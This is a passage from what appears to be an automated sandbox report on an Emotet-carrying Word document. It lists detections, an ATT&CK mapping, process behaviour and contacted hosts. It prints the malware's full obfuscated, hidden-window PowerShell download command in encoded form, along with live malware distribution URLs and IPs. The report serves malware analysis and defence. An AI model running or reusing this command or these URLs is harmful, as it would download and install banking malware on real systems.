CsAKAAnADoALwAvAHYAZQB0AGUAcgAnACsAJwBpAG4AYQByAGkAYQAnACsAJwBkACcAKQArACgAJwByAHAAJwArACcAbwBwACcAKQArACgAJwB1AGkALgBjAG8AJwArACcAbQAnACkAKwAoACcALwAnACsAJwBjAG8AJwApACsAJwBuACcAKwAnAHQAZQAnACsAKAAnAG4AdAAnACsAJwAvADUAZgAnACkAKwAnADEAJwArACcAOABRACcAK
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe POwersheLL -w hidden -ENCOD IABzAFYAIAAgACgAIgBLACIAKwAiADQANwBkACIAKQAgACAAKABbAHQAWQBQAGUAXQAoACIAewA0AH0AewAxAH0AewAwAH0AewAzAH0AewAyAH0AIgAtAEYAJwBzACcALAAnAHkAJwAsACcAZQBjAFQAbwByAFkAJwAsACcAVABFAG0ALgBJAG8ALgBEAEkAcgAnACwAJwBzACcAKQApACAAIAA7ACAAIAAgACAAJABXAGkAOAAgAD0AWwB0AHkAUABlAF0AKAAiAHsAMgB9AHsAMwB9AHsANwB9AHsAMQB9AHsANAB9AHsANgB9AHsANQB9AHsAOAB9AHsAMAB9ACIALQBGACAAJwBnAEUAUgAnACwAJwAuAE4AZQB0AC4AUwBFAFIAVgAnACwAJwBTAFkAcwAnACwAJwBUAGUAJwAsACcASQAnACwAJwB0AG0AQQAnACwAJwBDAGUAUABPAEkATgAnACwAJwBtACcALAAnAE4AYQAnACkAIAA7ACAAJABFAHIAcgBvAHIAQQBjAHQAaQBvAG4AUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAoACgAJwBTAGkAbABlAG4AdAAnACsAJwBsAHkAJwApACsAJwBDACcAKwAoACcAbwBuACcAKwAnAHQAaQAnACkAKwAnAG4AJwArACcAdQBlACcAKQA7ACQATwBsADkAbwBuAGsAaQA9ACQAQwAwADIAVwAgACsAIABbAGMAaABhAHIAXQAoADYANAApACAAKwAgACQAQQAwADMAUAA7ACQASAAyADcAWAA9ACgAJwBJACcAKwAoACcANgAnACsAJwA3AFEAJwApACkAOwAgACAAKABnAGkAIAAoACIAVgBhAFIAIgArACIAaQBBAEIATABlADoAawAiACsAIgA0ADcAZAAiACkAIAAgACkALgB2AGEATAB1AGUAOgA6ACIAQwByAEUAYABBAGAAVABgAEUARABJAFIAZQBDAFQAYABPAFIAeQAiACgAJABIAE8ATQBFACAAKwAgACgAKAAnAHsAJwArACcAMAAnACsAJwB9AE4AcwAnACsAJwBwACcAKwAnAHoAdgBzAGcAewAnACsAJwAwAH0AJwArACcAUwBqAF8AZAB3AGcAcwB7ACcAKwAnADAAfQAnACkAIAAgAC0AZgAgAFsAQwBIAEEAUgBdADkAMgApACkAOwAkAFQANAA4AEsAPQAoACcASAAnACsAKAAnADYAMQAnACsAJwBEACcAKQApADsAIAAgACQAVwBpADgAOgA6ACIAcwBlAGMAdQBSAGkAdABgAHkAcAByAE8AYABUAGAAbwBjAG8ATAAiACAAPQAgACgAKAAnAFQAbAAnACsAJwBzACcAKQArACcAMQAyACcAKQA7ACQAQwA1ADkATQA9ACgAKAAnAE0AJwArACcAMgA0ACcAKQArACcAUAAnACkAOwAkAFgAbQBtAGgAawBlAGQAIAA9ACAAKAAoACcAUgAnACsAJwAzADEAJwApACsAJwBOACcAKQA7ACQAQQA2ADkASQA9ACgAKAAnAFAAXwAnACsAJwA2ACcAKQArACcAQgAnACkAOwAkAFEAMgB5AGcAOQBnAF8APQAkAEgATwBNAEUAKwAoACgAKAAnADEAJwArACcAdwByACcAKQArACgAJwBOAHMAJwArACcAcAB6ACcAKQArACgAJwB2ACcAKwAnAHMAZwAnACkAKwAnADEAdwAnACsAKAAnAHIAUwAnACsAJwBqAF8AJwArACcAZAB3ACcAKwAnAGcAcwAxAHcAcgAnACkAKQAuACIAcgBFAHAAYABsAEEAYwBlACIAKAAoAFsAQwBoAGEAcgBdADQAOQArAFsAQwBoAGEAcgBdADEAMQA5ACsAWwBDAGgAYQByAF0AMQAxADQAKQAsACcAXAAnACkAKQArACQAWABtAG0AaABrAGUAZAArACgAKAAnAC4AZAAnACsAJwBsACcAKQArACcAbAAnACkAOwAkAFUAMwA5AFIAPQAoACcATQAwACcAKwAnADEAUAAnACkAOwAkAFEAYwBlAGMAaAA0AGgAPQAoACcAXQBhACcAKwAoACcAbgAnACsAJwB3AFsAMwA6AC8ALwAnACkAKwAoACcAdwAnACsAJwBwAHMAJwApACsAJwBhACcAKwAnAHAAawAnACsAKAAnAC4AYwBvACcAKwAnAG0ALwB3AHAALQAnACsAJwBhAGQAJwArACcAbQBpACcAKQArACgAJwBuAC8AdgAnACsAJwAvAEAAJwApACsAJwBdACcAKwAoACcAYQBuAHcAJwArACcAWwAzACcAKwAnADoALwAvAHMAJwApACsAKAAnAG8AZgBzAHUAJwArACcAaQAnACkAKwAnAHQAZQAnACsAKAAnAC4AYwAnACsAJwBvACcAKQArACcAbQAvACcAKwAnAHcAcAAnACsAKAAnAC0AaQAnACsAJwBuAGMAJwApACsAKAAnAGwAdQBkACcAKwAnAGUAJwApACsAJwBzAC8AJwArACgAJwAyAGoAbQAzAG4AJwArACcASQBrAC8AJwArACcAQAAnACkAKwAoACcAXQBhACcAKwAnAG4AdwBbACcAKQArACcAMwAnACsAKAAnADoALwAvAHYAZQB0AGUAcgAnACsAJwBpAG4AYQByAGkAYQAnACsAJwBkACcAKQArACgAJwByAHAAJwArACcAbwBwACcAKQArACgAJwB1AGkALgBjAG8AJwArACcAbQAnACkAKwAoACcALwAnACsAJwBjAG8AJwApACsAJwBuACcAKwAnAHQAZQAnACsAKAAnAG4AdAAnACsAJwAvADUAZgAnACkAKwAnADEAJwArACcAOABRACcAK
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_10004C5A cpuid
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\powershell_ise.exe VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\hh.exe VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Windows\SysWOW64\rundll32.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_10007D46 GetSystemTimeAsFileTime,GetCurrentThreadId,GetTickCount64,QueryPerformanceCounter,
                      Source: C:\Windows\SysWOW64\rundll32.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

                      Stealing of Sensitive Information:

                      barindex
                      Yara detected EmotetShow sources
                      Source: Yara matchFile source: 0000000A.00000002.2105264847.00000000001F1000.00000020.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000007.00000002.2100881704.00000000001F0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000008.00000002.2102904975.0000000000321000.00000020.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000C.00000002.2109299524.00000000001F0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000A.00000002.2105243347.00000000001C0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000D.00000002.2339862225.00000000001F1000.00000020.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000007.00000002.2100903607.0000000000211000.00000020.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000008.00000002.2102822583.0000000000300000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000C.00000002.2109419000.0000000000211000.00000020.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000B.00000002.2108184568.00000000002E1000.00000020.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000B.00000002.2107810345.0000000000240000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000D.00000002.2339841860.00000000001C0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000009.00000002.2103779024.00000000001B0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000009.00000002.2103864264.00000000001F1000.00000020.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 7.2.rundll32.exe.1f0000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 13.2.rundll32.exe.1f0000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 9.2.rundll32.exe.1b0000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 9.2.rundll32.exe.1b0000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 13.2.rundll32.exe.1c0000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 7.2.rundll32.exe.210000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 10.2.rundll32.exe.1c0000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 12.2.rundll32.exe.210000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 11.2.rundll32.exe.240000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 9.2.rundll32.exe.1f0000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 10.2.rundll32.exe.1f0000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 7.2.rundll32.exe.1f0000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 11.2.rundll32.exe.240000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 11.2.rundll32.exe.2e0000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 8.2.rundll32.exe.320000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 8.2.rundll32.exe.300000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 13.2.rundll32.exe.1c0000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 12.2.rundll32.exe.1f0000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 10.2.rundll32.exe.1c0000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 12.2.rundll32.exe.1f0000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 8.2.rundll32.exe.300000.0.unpack, type: UNPACKEDPE

                      Mitre Att&ck Matrix

                      Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
                      Valid AccountsWindows Management Instrumentation11Path InterceptionProcess Injection111Disable or Modify Tools1OS Credential DumpingSystem Time Discovery1Remote ServicesArchive Collected Data1Exfiltration Over Other Network MediumIngress Tool Transfer3Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
                      Default AccountsScripting32Boot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsDeobfuscate/Decode Files or Information3LSASS MemoryFile and Directory Discovery3Remote Desktop ProtocolData from Removable MediaExfiltration Over BluetoothEncrypted Channel22Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
                      Domain AccountsNative API1Logon Script (Windows)Logon Script (Windows)Scripting32Security Account ManagerSystem Information Discovery26SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationNon-Application Layer Protocol3Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
                      Local AccountsExploitation for Client Execution3Logon Script (Mac)Logon Script (Mac)Obfuscated Files or Information1NTDSSecurity Software Discovery31Distributed Component Object ModelInput CaptureScheduled TransferApplication Layer Protocol14SIM Card SwapCarrier Billing Fraud
                      Cloud AccountsCommand and Scripting Interpreter211Network Logon ScriptNetwork Logon ScriptMasquerading11LSA SecretsVirtualization/Sandbox Evasion2SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
                      Replication Through Removable MediaPowerShell3Rc.commonRc.commonVirtualization/Sandbox Evasion2Cached Domain CredentialsProcess Discovery2VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
                      External Remote ServicesScheduled TaskStartup ItemsStartup ItemsProcess Injection111DCSyncRemote System Discovery1Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
                      Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/JobHidden Files and Directories1Proc FilesystemNetwork Service ScanningShared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
                      Exploit Public-Facing ApplicationPowerShellAt (Linux)At (Linux)Rundll321/etc/passwd and /etc/shadowSystem Network Connections DiscoverySoftware Deployment ToolsData StagedExfiltration Over Asymmetric Encrypted Non-C2 ProtocolWeb ProtocolsRogue Cellular Base StationData Destruction

                      Behavior Graph

                      Hide Legend

                      Legend:

                      • Process
                      • Signature
                      • Created File
                      • DNS/IP Info
                      • Is Dropped
                      • Is Windows Process
                      • Number of created Registry Values
                      • Number of created Files
                      • Visual Basic
                      • Delphi
                      • Java
                      • .Net C# or VB.NET
                      • C, C++ or other language
                      • Is malicious
                      • Internet
                      behaviorgraph top1 signatures2 2 Behavior Graph ID: 337092 Sample: MAIL-0573188.doc Startdate: 07/01/2021 Architecture: WINDOWS Score: 100 58 Multi AV Scanner detection for domain / URL 2->58 60 Antivirus detection for URL or domain 2->60 62 Multi AV Scanner detection for submitted file 2->62 64 13 other signatures 2->64 14 cmd.exe 2->14         started        17 WINWORD.EXE 293 27 2->17         started        process3 signatures4 78 Suspicious powershell command line found 14->78 80 Very long command line found 14->80 82 Encrypted powershell cmdline option found 14->82 84 PowerShell case anomaly found 14->84 19 powershell.exe 12 9 14->19         started        22 msg.exe 14->22         started        process5 dnsIp6 48 khanhhoahomnay.net 210.86.239.69, 49171, 80 NETNAM-AS-APNetnamCompanyVN Viet Nam 19->48 50 veterinariadrpopui.com 209.59.139.39, 49167, 80 LIQUIDWEBUS United States 19->50 52 3 other IPs or domains 19->52 24 rundll32.exe 19->24         started        process7 process8 26 rundll32.exe 15 24->26         started        signatures9 72 Hides that the sample has been downloaded from the Internet (zone.identifier) 26->72 29 rundll32.exe 5 26->29         started        process10 signatures11 74 Hides that the sample has been downloaded from the Internet (zone.identifier) 29->74 32 rundll32.exe 5 29->32         started        process12 signatures13 56 Hides that the sample has been downloaded from the Internet (zone.identifier) 32->56 35 rundll32.exe 5 32->35         started        process14 signatures15 66 Hides that the sample has been downloaded from the Internet (zone.identifier) 35->66 38 rundll32.exe 5 35->38         started        process16 signatures17 68 Hides that the sample has been downloaded from the Internet (zone.identifier) 38->68 41 rundll32.exe 5 38->41         started        process18 signatures19 70 Hides that the sample has been downloaded from the Internet (zone.identifier) 41->70 44 rundll32.exe 13 41->44         started        process20 dnsIp21 54 5.2.136.90, 49172, 80 RCS-RDS73-75DrStaicoviciRO Romania 44->54 76 System process connects to network (likely due to code injection or exploit) 44->76 signatures22

                      Screenshots

                      Thumbnails

                      This section contains all screenshots as thumbnails, including those not shown in the slideshow.

                      windows-stand

                      Antivirus, Machine Learning and Genetic Malware Detection

                      Initial Sample

                      SourceDetectionScannerLabelLink
                      MAIL-0573188.doc67%VirustotalBrowse
                      MAIL-0573188.doc50%MetadefenderBrowse

                      Dropped Files

                      No Antivirus matches

                      Unpacked PE Files

                      SourceDetectionScannerLabelLinkDownload
                      7.2.rundll32.exe.210000.1.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                      13.2.rundll32.exe.1f0000.1.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                      12.2.rundll32.exe.210000.1.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                      9.2.rundll32.exe.1f0000.1.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                      10.2.rundll32.exe.1f0000.1.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                      11.2.rundll32.exe.2e0000.1.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                      8.2.rundll32.exe.320000.1.unpack100%AviraTR/Crypt.XPACK.GenDownload File

                      Domains

                      SourceDetectionScannerLabelLink
                      veterinariadrpopui.com7%VirustotalBrowse
                      wpsapk.com1%VirustotalBrowse
                      sofsuite.com4%VirustotalBrowse
                      khanhhoahomnay.net6%VirustotalBrowse

                      URLs

                      SourceDetectionScannerLabelLink
                      https://shop.elemenslide.com/wp-content/n/0%Avira URL Cloudsafe
                      http://veterinariadrpopui.com100%Avira URL Cloudmalware
                      http://veterinariadrpopui.com/content/5f18Q/100%Avira URL Cloudmalware
                      http://sofsuite.com/wp-includes/2jm3nIk/100%Avira URL Cloudphishing
                      http://khanhhoahomnay.net/wordpress/CGMC/100%Avira URL Cloudmalware
                      http://windowsmedia.com/redir/services.asp?WMPFriendly=true0%URL Reputationsafe
                      http://windowsmedia.com/redir/services.asp?WMPFriendly=true0%URL Reputationsafe
                      http://windowsmedia.com/redir/services.asp?WMPFriendly=true0%URL Reputationsafe
                      http://beatlemail.net/picture.php?blogid=00%Avira URL Cloudsafe
                      https://gurztac.wtchevalier.com/wp-content/YzZ6YZ/100%Avira URL Cloudmalware
                      https://shop.elemenslide.com0%Avira URL Cloudsafe
                      http://www.icra.org/vocabulary/.0%URL Reputationsafe
                      http://www.icra.org/vocabulary/.0%URL Reputationsafe
                      http://www.icra.org/vocabulary/.0%URL Reputationsafe
                      http://shop.elemenslide.com0%Avira URL Cloudsafe
                      http://khanhhoahomnay.net0%Avira URL Cloudsafe
                      http://shop.elemenslide.com/wp-content/n/100%Avira URL Cloudmalware
                      http://sofsuite.com0%Avira URL Cloudsafe
                      http://wpsapk.com0%Avira URL Cloudsafe
                      http://www.%s.comPA0%URL Reputationsafe
                      http://www.%s.comPA0%URL Reputationsafe
                      http://www.%s.comPA0%URL Reputationsafe
                      http://wpsapk.com/wp-admin/v/100%Avira URL Cloudmalware
                      https://shop.elemenslide.comp0%Avira URL Cloudsafe

                      Domains and IPs

                      Contacted Domains

                      NameIPActiveMaliciousAntivirus DetectionReputation
                      veterinariadrpopui.com
                      		209.59.139.39
                      		truetrueunknown
                      wpsapk.com
                      		172.67.141.14
                      		truetrueunknown
                      sofsuite.com
                      		172.67.158.72
                      		truetrueunknown
                      khanhhoahomnay.net
                      		210.86.239.69
                      		truetrueunknown
                      shop.elemenslide.com
                      		45.130.229.91
                      		truetrue
                        		unknown

                        Contacted URLs

                        NameMaliciousAntivirus DetectionReputation
                        http://veterinariadrpopui.com/content/5f18Q/true
                        • Avira URL Cloud: malware
                        		unknown
                        http://sofsuite.com/wp-includes/2jm3nIk/true
                        • Avira URL Cloud: phishing
                        		unknown
                        http://khanhhoahomnay.net/wordpress/CGMC/true
                        • Avira URL Cloud: malware
                        		unknown
                        http://shop.elemenslide.com/wp-content/n/true
                        • Avira URL Cloud: malware
                        		unknown
                        http://wpsapk.com/wp-admin/v/true
                        • Avira URL Cloud: malware
                        		unknown

                        URLs from Memory and Binaries

                        NameSourceMaliciousAntivirus DetectionReputation
                        http://www.windows.com/pctv.rundll32.exe, 00000008.00000002.2103265180.0000000001FC0000.00000002.00000001.sdmpfalse
                          		high
                          https://shop.elemenslide.com/wp-content/n/powershell.exe, 00000005.00000002.2105524731.0000000003AF7000.00000004.00000001.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          http://veterinariadrpopui.compowershell.exe, 00000005.00000002.2105458162.0000000003AB9000.00000004.00000001.sdmptrue
                          • Avira URL Cloud: malware
                          		unknown
                          http://investor.msn.comrundll32.exe, 00000006.00000002.2105175373.0000000001CF0000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2101374125.00000000020F0000.00000002.00000001.sdmpfalse
                            		high
                            http://www.msnbc.com/news/ticker.txtrundll32.exe, 00000006.00000002.2105175373.0000000001CF0000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2101374125.00000000020F0000.00000002.00000001.sdmpfalse
                              		high
                              http://www.piriform.com/ccleaneH)powershell.exe, 00000005.00000002.2098871684.00000000002B4000.00000004.00000020.sdmpfalse
                                		high
                                http://windowsmedia.com/redir/services.asp?WMPFriendly=truerundll32.exe, 00000006.00000002.2105653312.0000000001ED7000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2101972300.00000000022D7000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2103626695.00000000021A7000.00000002.00000001.sdmp, rundll32.exe, 0000000B.00000002.2110270335.0000000001FD7000.00000002.00000001.sdmpfalse
                                • URL Reputation: safe
                                • URL Reputation: safe
                                • URL Reputation: safe
                                		unknown
                                http://www.hotmail.com/oerundll32.exe, 00000006.00000002.2105175373.0000000001CF0000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2101374125.00000000020F0000.00000002.00000001.sdmpfalse
                                  		high
                                  http://beatlemail.net/picture.php?blogid=0powershell.exe, 00000005.00000002.2105381598.0000000003A66000.00000004.00000001.sdmpfalse
                                  • Avira URL Cloud: safe
                                  		unknown
                                  https://gurztac.wtchevalier.com/wp-content/YzZ6YZ/powershell.exe, 00000005.00000002.2104428008.0000000003732000.00000004.00000001.sdmptrue
                                  • Avira URL Cloud: malware
                                  		unknown
                                  https://www.cloudflare.com/5xx-error-landingpowershell.exe, 00000005.00000002.2105417379.0000000003A8B000.00000004.00000001.sdmp, powershell.exe, 00000005.00000002.2105458162.0000000003AB9000.00000004.00000001.sdmpfalse
                                    		high
                                    https://shop.elemenslide.compowershell.exe, 00000005.00000002.2105524731.0000000003AF7000.00000004.00000001.sdmpfalse
                                    • Avira URL Cloud: safe
                                    		unknown
                                    http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Checkrundll32.exe, 00000006.00000002.2105653312.0000000001ED7000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2101972300.00000000022D7000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2103626695.00000000021A7000.00000002.00000001.sdmp, rundll32.exe, 0000000B.00000002.2110270335.0000000001FD7000.00000002.00000001.sdmpfalse
                                      		high
                                      http://www.icra.org/vocabulary/.rundll32.exe, 00000006.00000002.2105653312.0000000001ED7000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2101972300.00000000022D7000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2103626695.00000000021A7000.00000002.00000001.sdmp, rundll32.exe, 0000000B.00000002.2110270335.0000000001FD7000.00000002.00000001.sdmpfalse
                                      • URL Reputation: safe
                                      • URL Reputation: safe
                                      • URL Reputation: safe
                                      		unknown
                                      http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.powershell.exe, 00000005.00000002.2099953292.0000000002400000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2103439208.00000000027A0000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2105096202.0000000002830000.00000002.00000001.sdmpfalse
                                        		high
                                        http://www.piriform.com/ccleanerhttp://www.piriform.com/ccleanervpowershell.exe, 00000005.00000002.2098871684.00000000002B4000.00000004.00000020.sdmpfalse
                                          		high
                                          http://shop.elemenslide.compowershell.exe, 00000005.00000002.2105524731.0000000003AF7000.00000004.00000001.sdmptrue
                                          • Avira URL Cloud: safe
                                          		unknown
                                          http://khanhhoahomnay.netpowershell.exe, 00000005.00000002.2105524731.0000000003AF7000.00000004.00000001.sdmptrue
                                          • Avira URL Cloud: safe
                                          		unknown
                                          http://investor.msn.com/rundll32.exe, 00000006.00000002.2105175373.0000000001CF0000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2101374125.00000000020F0000.00000002.00000001.sdmpfalse
                                            		high
                                            http://sofsuite.compowershell.exe, 00000005.00000002.2105417379.0000000003A8B000.00000004.00000001.sdmptrue
                                            • Avira URL Cloud: safe
                                            		unknown
                                            https://www.cloudflare.com/5xx-error-landing/powershell.exe, 00000005.00000002.2105381598.0000000003A66000.00000004.00000001.sdmpfalse
                                              		high
                                              http://wpsapk.compowershell.exe, 00000005.00000002.2104428008.0000000003732000.00000004.00000001.sdmptrue
                                              • Avira URL Cloud: safe
                                              		unknown
                                              http://www.%s.comPApowershell.exe, 00000005.00000002.2099953292.0000000002400000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2103439208.00000000027A0000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2105096202.0000000002830000.00000002.00000001.sdmpfalse
                                              • URL Reputation: safe
                                              • URL Reputation: safe
                                              • URL Reputation: safe
                                              		low
                                              https://shop.elemenslide.comppowershell.exe, 00000005.00000002.2105524731.0000000003AF7000.00000004.00000001.sdmpfalse
                                              • Avira URL Cloud: safe
                                              		unknown

                                              Contacted IPs

                                              • No. of IPs < 25%
                                              • 25% < No. of IPs < 50%
                                              • 50% < No. of IPs < 75%
                                              • 75% < No. of IPs

                                              Public

                                              IPDomainCountryFlagASNASN NameMalicious
                                              210.86.239.69
                                              		unknownViet Nam
                                              		24173NETNAM-AS-APNetnamCompanyVNtrue
                                              209.59.139.39
                                              		unknownUnited States
                                              		32244LIQUIDWEBUStrue
                                              172.67.141.14
                                              		unknownUnited States
                                              		13335CLOUDFLARENETUStrue
                                              45.130.229.91
                                              		unknownGermany
                                              		47583AS-HOSTINGERLTtrue
                                              5.2.136.90
                                              		unknownRomania
                                              		8708RCS-RDS73-75DrStaicoviciROtrue
                                              172.67.158.72
                                              		unknownUnited States
                                              		13335CLOUDFLARENETUStrue

                                              General Information

                                              Joe Sandbox Version:31.0.0 Red Diamond
                                              Analysis ID:337092
                                              Start date:07.01.2021
                                              Start time:18:43:35
                                              Joe Sandbox Product:CloudBasic
                                              Overall analysis duration:0h 9m 17s
                                              Hypervisor based Inspection enabled:false
                                              Report type:light
                                              Sample file name:MAIL-0573188.doc
                                              Cookbook file name:defaultwindowsofficecookbook.jbs
                                              Analysis system description:Windows 7 x64 SP1 with Office 2010 SP2 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
                                              Number of analysed new started processes analysed:15
                                              Number of new started drivers analysed:0
                                              Number of existing processes analysed:0
                                              Number of existing drivers analysed:0
                                              Number of injected processes analysed:0
                                              Technologies:
                                              • HCA enabled
                                              • EGA enabled
                                              • HDC enabled
                                              • GSI enabled (VBA)
                                              • AMSI enabled
                                              Analysis Mode:default
                                              Analysis stop reason:Timeout
                                              Detection:MAL
                                              Classification:mal100.troj.expl.evad.winDOC@22/8@6/6
                                              EGA Information:Failed
                                              HDC Information:
                                              • Successful, ratio: 84.3% (good quality ratio 80.8%)
                                              • Quality average: 74.4%
                                              • Quality standard deviation: 25.6%
                                              HCA Information:
                                              • Successful, ratio: 91%
                                              • Number of executed functions: 0
                                              • Number of non-executed functions: 0
                                              Cookbook Comments:
                                              • Adjust boot time
                                              • Enable AMSI
                                              • Found application associated with file extension: .doc
                                              • Found Word or Excel or PowerPoint or XPS Viewer
                                              • Found warning dialog
                                              • Click Ok
                                              • Attach to Office via COM
                                              • Scroll down
                                              • Close Viewer
                                              Warnings:
                                              Show All
                                              • Exclude process from analysis (whitelisted): dllhost.exe, conhost.exe
                                              • TCP Packets have been reduced to 100
                                              • Report size exceeded maximum capacity and may have missing behavior information.
                                              • Report size getting too big, too many NtOpenKeyEx calls found.
                                              • Report size getting too big, too many NtQueryAttributesFile calls found.
                                              • Report size getting too big, too many NtQueryValueKey calls found.

                                              Simulations

                                              Behavior and APIs

                                              TimeTypeDescription
                                              18:44:38API Interceptor1x Sleep call for process: msg.exe modified
                                              18:44:39API Interceptor67x Sleep call for process: powershell.exe modified
                                              18:44:46API Interceptor883x Sleep call for process: rundll32.exe modified

                                              Joe Sandbox View / Context

                                              IPs

                                              MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                              210.86.239.69dat_513543.docGet hashmaliciousBrowse
                                              • khanhhoahomnay.net/wordpress/CGMC/
                                              DATA-480841.docGet hashmaliciousBrowse
                                              • khanhhoahomnay.net/wordpress/CGMC/
                                              Documenten_9274874 8574977265.docGet hashmaliciousBrowse
                                              • khanhhoahomnay.net/wordpress/CGMC/
                                              pack-91089 416755919.docGet hashmaliciousBrowse
                                              • khanhhoahomnay.net/wordpress/CGMC/
                                              209.59.139.39dat_513543.docGet hashmaliciousBrowse
                                              • veterinariadrpopui.com/content/5f18Q/
                                              DATA-480841.docGet hashmaliciousBrowse
                                              • veterinariadrpopui.com/content/5f18Q/
                                              Documenten_9274874 8574977265.docGet hashmaliciousBrowse
                                              • veterinariadrpopui.com/content/5f18Q/
                                              pack-91089 416755919.docGet hashmaliciousBrowse
                                              • veterinariadrpopui.com/content/5f18Q/
                                              Adjunto.docGet hashmaliciousBrowse
